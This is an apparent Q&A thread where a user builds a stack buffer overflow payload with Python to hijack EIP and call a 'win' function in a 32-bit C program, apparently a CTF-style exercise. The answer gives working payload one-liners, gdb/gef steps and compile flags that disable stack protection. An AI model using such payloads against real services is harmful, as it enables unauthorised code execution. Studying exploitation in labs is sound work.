# How to generate payload with python for buffer overflow?

Tags: python-2.7, endianness, buffer-overflow, exploit

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following

```
python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
```

This is what I get

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
```

Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on `EIP` register is `0804863b`. I had to put this on `little endian` for the exploit to run properly. Any comments on this?

Answer (score 0, accepted):

If you run this payload:

```
python -c 'print "A"*112 + "B"*4'  > attack_payload
```

And then if you have the control of the `PC (EIP=42424242)`

```
(gdb) r < attack_payload
```

You can replace the "`BBBB`" with your address `0804863b`

```
python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
```

It is all, you should verify before if you have the EIP control.

More info (I see the source code), in a simple way (for a better explanation) try to compile with the following command

```
gcc -o main main.c -fno-stack-protector -g -m32
```

Run it with the debugger (`gdb ./main`) and set the following breakpoint

```
gef➤  b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
```

Continue and insert the following payload

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
```

Go on at the instruction

```
 →  0x804862d <stringLength+60> ret
```

And you can see that now you have the control of the ret value

```
gef➤  bt
#0  0x0804862d in stringLength () at main.c:14
#1  0x43434343 in ?? ()
#2  0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤  x/x $sp
0xffffd5ec: 0x43434343
```

Now you can replace "`CCCC`" with the address of the win function

```
gef➤  p win
$1 = {void ()} 0x80485dd <win>
```

You can automatize all with a simple python script (try to see this library [pwntools](http://docs.pwntools.com/en/stable/)), you payload will be:

```
payload = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
payload += "\xdd\x85\x04\x08"
```

Or also you can run

```
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main
```

Comment: Sure, but I can't feed it directly like that `(gdb) r < attack_payload` . Please follow the [link](https://pastebin.com/tv7zyvF0) to the code.

Comment: @fish202 I added more info

Comment: I already managed to that by the time you gave me the answer. Nevertheless, great explanation on it and nice tip on `pwntools` looks very promising and easy practical. Thx m8.

Comment: just another question. Hopefully you'll give me some feedback. I was able to execute my win function. That same program is running remotely and the payload is the same in order to exploit it but when I pipe it to `nc x.x.x.x port`I dont't get all the info (the execution of win doesn't appear). This made me thinking what's the reason why. Perhaps the buffer of `netcat` is limitted or `nc` reads more faster than the program writes. Or `nc` doesn't display `stderr` messages at all. Any thoughts on this?